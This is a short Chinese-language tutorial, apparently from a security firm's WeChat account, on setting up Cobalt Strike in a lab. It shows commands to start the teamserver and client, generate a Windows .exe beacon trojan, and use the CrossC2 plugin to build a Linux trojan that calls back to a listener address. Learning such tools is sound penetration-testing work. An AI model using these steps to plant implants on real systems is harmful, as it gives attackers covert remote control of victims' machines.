Cobalt Strike介绍
声明:操作环境均为搭建的虚拟环境
Cobalt Strike使用
因为启动CS需要JDK的支持,所以需要安装Java环境。这个不做过多描述了。
下载后解压,也可以在Linux系统下使用。
CobaltStrike分为客户端和服务端。Cobalt Strike 需要团队服务器才能使用,服务端被称为团队服务器,是Beacon有效负载的控制器,团队服务器还会存储CobaltStrike收集的数据,并管理日志记录teamserver就为服务端的运行程序。
CS服务器teamserver必须以root身份运行在所支持的操作系统上。需要文件 teamserver 与 cobaltstrike.jar
进到cobaltstrike目录下
启动团队服务器
在cobaltstrike目录下执行,IP可以写本机的,密码就随便写了
./teamserver IP Password
启动CS客户端
在cobaltstrike目录下执行启动。
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
Windows
生成Windows的木马
先配置监听器,先点 Coblalt Strike的监听器,然后点击add进行添加
然后生成一个Windows.exe的木马,点击攻击,生成后门,Windows Executale
生成一个.exe的木马
然后启动Windows的虚拟机,把文件复制到Windows里面
点击运行,成功上线,然后点击进入beacon,然后cs的功能还是比较多的,我就不演示了
输入shell ipconfig 查看ip
Linux
如果目标主机是Linux的话,Cobalt Strike也是可以进行渗透的,不过需要CrossC2这个插件,我们可以在github上可以找到,这里要注意一下,CrossC2有适应Cobalt Strike它的版本,如果是3.X的版本就默认下载,如果版本不匹配,可能会无法上线的。
我的是4.0版本,所以下CS4.0的分支
执行git clone -b cs4.0 https://github.com/gloxec/CrossC2
下载到cobaltstrike目录下,进入到插件的src目录
修改CrossC2.can,一个是当前路径,一个是要攻击的目标系统
把cobaltstrike下的一个隐藏文件复制到插件的src目录
配置一个监听器,注意Linux系统只能走HTTPS协议
在cobalt strike下点击脚本管理器,点击load选择我们配置好的CrossC2.can文件
我们添加好之后,用genCrossC2.Linux生成一个名叫test1的Linux的木马。
./genCrossC2.Linux 192.168.1.107 6655 /home/black/cs4.0汉化版/cs4.0/cobaltstrike/CrossC2/src/.cobaltstrike.beacon_keys null Linux x64 test1
然后把test1文件放到目标主机上,但一般情况test1没有执行权限,先给文件权限在运行
运行完之后,去CS上看是否上线,成功上线
总结
虽说CS对Linux系统不太友善,但总的来说还是一款神器。
天磊卫士|专注网络安全服务
咨询热线:400-654-0108
官网:https://www.uguardsec.com
分支机构:深圳、海口、北京、青岛、汕尾
漏洞扫描|整改加固|渗透测试|APP安全评估|安全运维
系统入网|上线安全评估|代码审计|应急响应|应急演练
原文始发于微信公众号(天磊卫士安全团队):渗透测试神器Cobalt Strike入门使用教程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论